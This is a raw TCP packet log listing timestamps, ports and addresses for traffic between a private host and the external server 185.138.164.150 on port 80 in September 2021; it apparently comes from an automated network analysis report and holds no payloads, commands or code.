Sep 27, 2021 23:55:25.727092028 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.727123976 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.727148056 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.727170944 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.730261087 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.734642029 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.734658957 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739229918 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739283085 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739321947 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739362001 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739398956 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739438057 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739479065 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739517927 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739558935 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739595890 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739646912 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739679098 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739701033 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739723921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739762068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739797115 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739840984 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739880085 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739919901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739958048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.739980936 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.740039110 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.740078926 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.740120888 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.740144968 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.740159988 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.740192890 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.740242958 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.740266085 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.740288019 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.740309954 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.740634918 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.765217066 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.765260935 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.765283108 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.765305996 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.765331030 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.765352011 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.765366077 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.765460968 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.776073933 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776108980 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776133060 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776171923 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776205063 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776227951 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776228905 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.776335001 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776411057 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.776427031 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.776427984 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776457071 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776480913 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776504040 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776504993 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.776550055 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.776551962 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776576042 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776598930 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776621103 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.776622057 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776648045 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776669025 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.776688099 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.776730061 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:27.794083118 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:27.829706907 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.035495043 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.035625935 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.035665035 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.035693884 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.035854101 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.035906076 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.035929918 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.036297083 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.036355972 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.036398888 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.036427975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.036456108 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.036480904 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.036566973 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.071067095 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.071203947 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.071223974 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.071244001 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.071261883 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.071315050 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.071320057 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.071347952 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.071348906 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.071371078 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.071389914 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.071429968 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.071721077 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.071880102 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.071916103 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.071938038 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.071959019 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.072006941 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.072030067 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.072077990 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.072184086 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.072266102 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.072402000 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.072468996 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.072488070 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.072511911 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.072551966 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.072565079 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.072649002 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.072705030 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.106384039 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.106410027 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.106424093 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.106442928 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.106456041 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.106529951 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.106544971 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.106563091 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.106575012 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.106578112 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.106602907 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.106643915 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.106667995 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.106689930 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.106712103 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.106730938 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.106738091 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.106746912 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.106765985 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.106775045 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.106813908 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.107048035 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.107395887 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.107420921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.107441902 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.107461929 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.107490063 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.107542992 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.107566118 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.107590914 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.107609034 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.107830048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.107882977 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.107884884 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.108388901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.108457088 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.109052896 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.109080076 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.109100103 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.109129906 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.109149933 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.109158993 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.109169960 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.109194040 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.109200954 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.109215975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.109224081 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.109276056 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.142510891 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.142544985 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.142680883 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.142889977 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.142908096 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.142915010 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.142937899 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.142971992 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.142991066 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.143034935 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.143058062 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.143080950 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.143131971 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.143136978 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.143182993 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.143410921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.143441916 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.143465996 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.143485069 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.143486977 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.143507004 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.143527031 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.143533945 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.143552065 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.143574953 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.143574953 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.143619061 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.144325972 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144354105 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144367933 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144417048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144438982 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144455910 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144465923 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.144506931 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144531012 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144542933 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.144577026 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.144701004 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144723892 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144746065 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144771099 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144798040 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144805908 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.144820929 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144845009 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144865990 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.144866943 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144891977 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144901991 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.144915104 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.144942999 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.144963980 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.145026922 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.145077944 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.145126104 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.178795099 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.178834915 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.178854942 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.178884029 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.178905964 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.178926945 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.178944111 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.178951979 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.178956985 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.179033995 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.179223061 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.179276943 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.179327965 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.179702997 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.179728031 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.179752111 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.179774046 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.179785013 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.179796934 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.179825068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.179837942 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.179847002 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.179876089 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.179898024 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.179945946 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.179996967 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180020094 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180042028 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180063963 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.180088997 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180130959 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180136919 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.180155993 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180180073 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180202007 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180202007 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.180224895 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180244923 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.180248022 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180274010 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180294991 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.180296898 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180320978 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180341959 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180345058 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.180361032 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180381060 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180397987 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180401087 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.180414915 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180444956 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.180454016 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180474997 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.180514097 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180531979 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.180561066 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.214312077 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.214333057 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.214351892 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.214473009 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.214479923 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.214512110 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.214570999 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.214584112 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.214607000 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.214643955 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.214688063 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.215831041 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.215851068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.215867996 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.215883017 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.215898991 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.215919971 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.215935946 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.215997934 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.216056108 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.216221094 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216243029 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216267109 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216289043 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216310978 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216320992 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.216335058 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.216377974 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216403008 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216423988 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216444969 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.216447115 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216476917 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216573000 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.216597080 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216607094 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.216622114 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216644049 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216666937 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216687918 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216790915 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.216871023 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216892004 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216908932 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.216926098 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.217024088 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.249970913 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.250004053 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.250030994 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.250053883 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.250075102 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.250097036 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.250186920 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.250216007 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.250272989 CEST	49745	80	192.168.2.3	185.138.164.150
